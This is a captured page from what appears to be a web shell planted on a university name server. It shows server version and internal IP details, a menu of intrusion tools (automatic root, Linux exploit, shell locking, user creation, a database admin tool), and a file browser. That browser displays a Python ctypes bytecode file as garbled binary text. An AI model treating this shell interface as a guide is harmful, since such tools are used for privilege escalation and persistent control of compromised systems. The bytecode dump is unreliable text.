Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
ctypes /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
_aix.cpython-310.pyc
9.64
KB
-rw-r--r--
_endian.cpython-310.pyc
1.86
KB
-rw-r--r--
__init__.cpython-310.pyc
15.51
KB
-rw-r--r--
util.cpython-310.pyc
8.19
KB
-rw-r--r--
wintypes.cpython-310.pyc
4.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.cpython-310.pyc
o #T_i�8 � @ s@ d dl Z d dlZd dlZd dlZe jdkr"dd� Zdd� Zdd� Znoe jd kr7ejd kr7d dl m Z dd� ZnZej�d �rDd dl mZ nMe jd kr�d dlZd dlZdd� Zdd� Zejdkrcdd� Zndd� Zej�d�rvdd� Zdd� Znejdkr�dd� Zd'dd�Zndd � Zd!d"� Zd#d� Zd$d%� Zed&kr�e� dS dS )(� N�ntc C s� d} t j�| �}|dkrdS |t| � }t j|d� �dd�\}}t|dd� �d }|dkr3|d7 }t|d d � �d }|dkrCd}|dkrK|| S dS ) z�Return the version of MSVC that was used to build Python. For Python 2.3 and up, the version number is included in sys.version. For earlier versions, assume the compiler is MSVC 6. zMSC v.���� N� � ���� � � g $@r )�sys�version�find�len�split�int)�prefix�i�s�rest�majorVersion�minorVersion� r �"/usr/lib/python3.10/ctypes/util.py�_get_build_version s r c C s^ t � } | du r dS | dkrd}n | dkrd| d }ndS ddl}d|jjv r+|d 7 }|d S )z%Return the name of the VC runtime dllNr �msvcrtr zmsvcr%d� r z_d.pyd�d�.dll)r �importlib.machinery� machinery�EXTENSION_SUFFIXES)r �clibname� importlibr r r �find_msvcrt"